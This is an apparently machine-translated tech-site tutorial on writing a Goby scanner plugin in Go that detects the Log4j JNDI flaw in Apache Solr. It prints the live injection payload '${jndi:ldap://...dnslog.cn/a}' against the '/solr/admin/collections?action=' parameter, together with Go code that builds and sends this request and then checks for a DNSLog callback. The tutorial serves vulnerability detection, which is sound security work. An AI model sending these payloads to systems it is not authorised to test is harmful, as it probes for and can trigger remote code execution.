Shulou(Shulou.com)06/01 Report--

Today, the editor will share with you how to use goby to detect log4j vulnerabilities. The content is detailed and the logic is clear. I believe most people still know too much about this, so share this article for your reference. I hope you can get something after reading this article. Let's take a look at it.

I. Preface

Some time ago, the impact of Log4j vulnerabilities is very extensive, and the use of many places has been made public on the Internet, but usually more goby is used, so I want to use goby fingerprint identification to detect the target. Goby can write go files to achieve some advanced vulnerability detection or exploitation, such as dnslog detection vulnerabilities.

Second, the recurrence of loopholes

First of all, we learned that the trigger point of the vulnerability is the action parameter.

/ solr/admin/collections?action=

It is verified by dnslog that there is a vulnerability in the target machine.

Payload:$ {jndi:ldap://24x44x.dnslog.cn/a}

Figure 1: sending payload

Figure 2: dnslog has an echo

III. Goby poc compilation

Goby is written through golang, and some vulnerability detection scenarios (such as dnslog verification), the JSON format of goby itself can not meet this requirement, so you need to write vulnerability code in Golang.

ExpJson part

1. First, add poc through goby poc management, fill in and save it according to the instructions of goby official vulnerability description template.

Figure 3: custom poc

2. Open the generated Apache_Solr_Log4j_JNDI_RCE.json file in the\ golib\ exploits\ user folder of the goby installation directory. If you do not need exp, change the true of the HasExp field to false.

Figure 4: generated json file

3. Copy the generated json code (without the outer curly braces) into the expJson: = {xxx} of the goby vulnerability detection golang template.

Package exploitsimport (/ / Import the corresponding package "fmt", "git.gobies.org/goby/goscanner/goutils", "git.gobies.org/goby/goscanner/jsonvul", "git.gobies.org/goby/goscanner/godclient", "git.gobies.org/goby/goscanner/scanconfig", "git.gobies.org/goby/httpclient", "strings", "time") func init () {expJson: = `{expJson part}` ExpManager.AddExploit (NewExploit (goutils.GetFileName (), expJson,nil, / / Custom POC function part) as required. Nil, / / Custom EXP function. If there is no EXP, write nil,)}

Goby vulnerability detection golang template

Custom POC function section

1. According to the official documentation

A custom POC consists of a function whose arguments are divided into

Composed of jsonvul.JsonVul, httpclient.FixUrl and scanconfig.SingleScanConfig structures, it confirms the existence of vulnerabilities by responding to bool. The function template is as follows:

Func (exp * jsonvul.JsonVul, u * httpclient.FixUrl, ss * scanconfig.SingleScanConfig) bool {return false}

You need to write golang code to detect the existence of vulnerabilities. If vulnerabilities are detected, true will be returned, but false will not be returned.

Figure 5: custom POC function section

CheckStr: = goutils.RandomHexString (4)

RandomHexString function: randomly generates a string of specified length

CheckUrl, isDomain: = godclient.GetGodCheckURL (checkStr)

GetGodCheckURL function: generate DNSLog address

Uri: = "/ solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D." + checkUrl + "/ a% 7D"

Vulnerability trigger point splicing payload

Cfg: = httpclient.NewGetRequestConfig (uri) / / NewGetRequestConfig: build GET request custom configuration, return RequestConfigcfg.VerifyTls = false / / ignore ssl verification cfg.FollowRedirect = false / / do not follow jump cfg.Header.Store ("Content-type", "application/x-www-form-urlencoded") / / Custom request header httpclient.DoHttpRequest (u, cfg) / / DoHttpRequest: build custom request configuration, send request, return request result HttpResponse

Build and send a custom configured GET request, and return the request result HttpResponse

Figure 6: get request sent to payload via proxy crawling to goby

Return godclient.PullExists (checkStr, time.Second*15)

Check whether dnslog has a successful HTTP request within a period of time, and return true if it is successful, otherwise return false.

Figure 7: check whether the dnslog has a successful HTTP request through the proxy crawling to the goby

Figure 8: vulnerability detection successful

Note:

1. ExpJson part of the GobyQuery query rules to ensure that the corresponding directory assets can be matched

2. Import goby and find that poc cannot be loaded. You need to check the code for problems.

3. To use the official function of goby, you need to import the corresponding package through import.

These are all the contents of the article "how to use goby to detect log4j vulnerabilities". Thank you for reading! I believe you will gain a lot after reading this article. The editor will update different knowledge for you every day. If you want to learn more knowledge, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.